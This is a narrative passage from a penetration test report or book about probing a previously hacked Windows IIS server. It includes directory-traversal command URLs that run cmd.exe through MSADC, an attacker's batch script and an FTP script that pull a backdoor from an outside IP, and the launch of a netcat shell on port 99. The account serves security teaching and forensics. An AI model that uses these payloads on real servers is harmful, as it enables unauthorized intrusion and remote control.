Penetration Testing: Day 1, Night
At this point, I had a good notion of where to start probing. Using the following URL, I commanded the server to show me a directory listing of the c:\winnt\system32 directory:
http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/ cmd.exe? /c+dir+c:\winnt\system32\
Once the browser returned the results, I scanned the files and folders and quickly spotted several suspicious files that perked my interest. Figure 1 is a screen shot of these filessee if you can spot the problem.
Figure 1 Partial directory listing of c:\winnt\system32\.
Did anything seem like it didn't belong? If you recognized these files for what they are, congratulations! Unfortunately, many network administrators wouldn't give these files a second glance.
The following is a listing of the files that concerned me and why:
PipeCmd.exe: Client side of a remote-control tool used by hackers.
omnithread_tr.dll: One of the three files needed to set up VNC, a popular and legitimate remote-control utility.
VNCHooks.dll: The second of three files needed to set up VNC.
Vnsystask.exe: The third of three files needed to set up an illegitimate back-door VNC program that hides from the user.
nc.exe: Netcat, a very common remote shell program.
pw.exe: Also known as pwdump(2).exe. A program that extracts NT users and passwords.
Samdump.dll: File required by pwdump.exe to extra user account information.
GetAdmin.exe: Common program that gives user administrator rights.
In other words, this server had not one, but two root kits installed in the c:\winnt\system32 directory. As I was about to learn, this was just one of more than 10 root kits that were all competing for the server's attention. In fact, the SysStat directory that is also shown in Figure 1 and that was installed October 7, 2002, includes yet another root kit.
Next, I used another URL to pull up the c:\ directory listing, just to see if there were any interesting files located in the root directory of the server. The following is the URL used. Listing 2 shows the output it provided.
http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/ cmd.exe, /c+dir+c:\
Listing 1-2: Directory Listing of the Server's C Drive
Volume in drive C has no label. Volume Serial Number is DCF0-0832 Directory of C: 10/10/02 01:03p 1,000,000 1mb 05/20/02 09:32a 0 AUTOEXEC.BAT 10/18/02 12:57a 789 bootobc.dll 10/10/02 12:42p 223 CDIR.TXT 05/20/02 09:32a 0 CONFIG.SYS 10/30/02 05:53p 0 dir.txt 11/23/99 10:04a 208,144 dns.exe 06/07/02 11:04a 524,288 errorlog.evt 05/28/02 07:06p <DIR> exchsrvr 10/04/02 06:38p 0 explorer.exe 10/04/02 06:38p 0 explorer.ini 05/20/02 10:18p <DIR> hpfonts 09/24/02 06:49p <DIR> hplj2100 09/29/02 01:03p 6,721,536 httpodbc.dll 09/27/02 09:36p <DIR> IIStmp 10/18/02 01:11a <DIR> InetPub 10/10/02 12:45p 6,656 INFUSE.EXE 10/10/02 12:43p 602 LOGIN.TXT 10/02/02 02:17p 59,392 ncx99.exe 10/30/02 02:47p 6,693 netstat.txt 10/30/02 10:09a 536,870,912 pagefile.sys 07/24/02 01:29p <DIR> Program Files 10/10/02 12:44p 81 pt.txt 10/14/02 05:21a 1,307 ra_slave.log 10/26/02 01:21p 716 Script.bat 10/26/02 01:21p 95 Script.txt 10/29/02 07:42p 1,949 servudaemon.ini 10/28/02 04:40p 528 ServUStartUpLog.txt 10/04/02 04:25p 15,000,000 SR.CD2-H2O.r41 09/28/02 01:33p <DIR> TEMP 10/10/02 12:43p 17,920 TLIST.EXE 06/18/02 10:00p <DIR> veritas 09/28/02 01:18p <DIR> WIN32 10/10/02 12:45p 496,836 WINMGNT.EXE 10/30/02 01:09p <DIR> WINNT 35 File(s) 560,918,667 bytes
At this point, I laughed as I started to realize the scope of infestation. In the root directory of the server were two files, scripts.bat and scripts.txt, that all but screamed "installed by a hacker." Out of curiosity, I decided to pull up the contents of these two files to see what they contained. The following are the URLs I used to do this. Listings 3 and 4 show the contents returned to the browser.
http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/ cmd.exe, /c+type+c:\scripts.bat http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/ cmd.exe, /c+type+c:\scripts.txt
Listing 1-3: Contents of the scripts.bat File
Mkdir c:\recycler Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117 Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash old_files Mkdir d:\recycler Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117 Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash old_files mkdir e:\recycler Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784038887-1117 Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784 c:\winnt\system32\ftp -n -s:script.txt c:\winnt\system32\svhost.exe /i c:\winnt\system32\psshutdown.exe -r -l -f
Listing 1-4: Contents of the scripts.txt File
open 210.171.xxx.xxx:11515 USER ironfredh hichic get svhost.exe get servudaemon.ini quit
In other words, this server was H4x0r3d. I was feeling a bit left out of the fun, so I figured I would follow the path so clearly laid before me. So, I typed in one last URL that would execute the ncx99.exe file sitting in the c: directory, and then I telnetted to port 99 on the server:
ncx99.exe is a popular hacked version of netcat that opens an unprotected shell on port 99. This allows anyone using any operating system that supports Telnet to connect to and control the host system.
Upon connection, I changed the directory to c:\ to verify that I was on the undeniably hacked server. I then performed a full directory listing and outputted the results to a file in the c:\ directory using the dir /s >> dir.txt command, which I then downloaded to my computer for a closer analysis.